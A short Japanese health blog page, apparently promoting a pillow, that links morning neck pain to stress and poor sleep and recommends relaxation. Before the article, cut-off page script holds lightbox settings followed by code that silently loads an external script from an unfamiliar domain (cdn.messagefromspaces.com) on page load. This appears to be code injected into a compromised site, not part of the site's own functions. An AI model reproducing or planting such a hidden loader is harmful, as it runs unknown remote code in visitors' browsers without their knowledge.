, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

朝起きると首が痛い!(改善編2)

朝起きると、寝違いによる首の痛みですが、生活習慣やストレスが要因の可能性があります。少しの生活改善で良くなることもありますのでご参考にどうぞ!

『日々の精神的なストレスと忙しさに気づきましょう!』
 
 日々の生活の中での心身へのストレスに気付いていますか?
 仕事に追われて精神的に疲れていたり、お子様の進学や成績、または友だち関係で気になることがあったり、多忙な生活に追われているときは神経が高ぶり、体が緊張しやすい状態になっています。
 緊張が続くと、体も精神的にもON・OFFの切り替えができなくなりストレスが溜まりやすい体質になっていきます。生活時間の中に深呼吸やストレッチなどの気分転換や音楽を聞く、映画を見る、森林浴をするなど、精神的ストレスの排除を心がけましょう。好きなことに没頭するのも良いかもしれませんね。
 緊張しながら睡眠すると、深い眠りが出来ない上に歯ぎしりや無意識に歯をくいしばったりして顎や頚椎(首)に負担がかかったりします。つまり、睡眠で疲れが取れなくなります。なるべくストレスを溜めないようにすることが大切でが、ゆっくり休んで深い睡眠をとることが体の疲れと精神的なストレス排除に繋がります。

快眠をサポートする「快眠枕(かいみんまくら)」を活用ください。

 


朝起きた時に首・肩・腰が痛いことはありませんか?
そんな悩みを受けて出来上がった枕があります


このページの先頭へ